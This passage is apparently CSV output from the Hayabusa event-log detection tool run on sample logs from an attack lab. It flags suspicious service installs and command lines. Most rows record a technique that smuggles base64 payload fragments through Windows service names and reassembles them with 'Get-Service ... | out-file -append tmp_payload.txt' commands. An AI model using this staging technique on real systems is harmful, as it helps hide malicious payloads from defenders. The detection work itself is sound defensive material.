Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:21:07.159 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b21wdXRlcmxpc3QgJENvbXB1dGVyQ291bnQgJENvbXB1dGVyTGlzdFR5cGUNCn0NCg0KJFRpbWUgPSBbbWF0aF06OlJvdW5kKCRUaW1lLlRvdGFsTWludXRlcywgMSkNCg0KV3JpdGUtTG9nICRJTk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:07.159 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b21wdXRlcmxpc3QgJENvbXB1dGVyQ291bnQgJENvbXB1dGVyTGlzdFR5cGUNCn0NCg0KJFRpbWUgPSBbbWF0aF06OlJvdW5kKCRUaW1lLlRvdGFsTWludXRlcywgMSkNCg0KV3JpdGUtTG9nICRJTk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:08.597 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZPX0xPRyAiRXZlbnQgTG9nIFJlcG9ydCBTdWNjZXNzZnVsbHkgQ2FsY3VsYXRlZCAmIEV4cG9ydGVkIC0gJENvbXB1dGVyQ291bnQgQ29tcHV0ZXJzIC0gJFRpbWUgTWludXRlcyAtICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:08.597 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZPX0xPRyAiRXZlbnQgTG9nIFJlcG9ydCBTdWNjZXNzZnVsbHkgQ2FsY3VsYXRlZCAmIEV4cG9ydGVkIC0gJENvbXB1dGVyQ291bnQgQ29tcHV0ZXJzIC0gJFRpbWUgTWludXRlcyAtICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:08.597 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZPX0xPRyAiRXZlbnQgTG9nIFJlcG9ydCBTdWNjZXNzZnVsbHkgQ2FsY3VsYXRlZCAmIEV4cG9ydGVkIC0gJENvbXB1dGVyQ291bnQgQ29tcHV0ZXJzIC0gJFRpbWUgTWludXRlcyAtICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:10.084 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Q29ubmVjdGlvbklzc3VlcyBDb25uZWN0aW9uIElzc3VlKHMpIg== | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg245"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:10.084 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyBDb25uZWN0aW9uIElzc3VlKHMpIg== | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg245"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:21:10.084 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyBDb25uZWN0aW9uIElzc3VlKHMpIg== | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg245"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:34:27.978 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via 
service name - Tchopper.evtx +2021-11-03 17:34:27.993 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc10 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:29.447 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9d0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:29.447 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xab8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:30.888 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" 
| select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:30.888 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xebc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:32.339 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x874 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:32.339 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc74 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:33.784 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe0c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:33.784 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:35.386 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:35.401 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xad8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:36.836 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:36.836 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:38.274 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:38.290 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf2c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:39.743 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:39.743 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:41.196 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:41.196 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x708 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:42.635 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe88 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:42.651 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:44.108 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf78 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:44.108 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:45.565 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:45.565 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xde0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:47.024 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x420 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:47.024 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x20c | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:48.467 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:48.482 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:49.925 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:49.925 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:51.386 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:51.386 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:52.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:52.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe0c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:54.271 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe 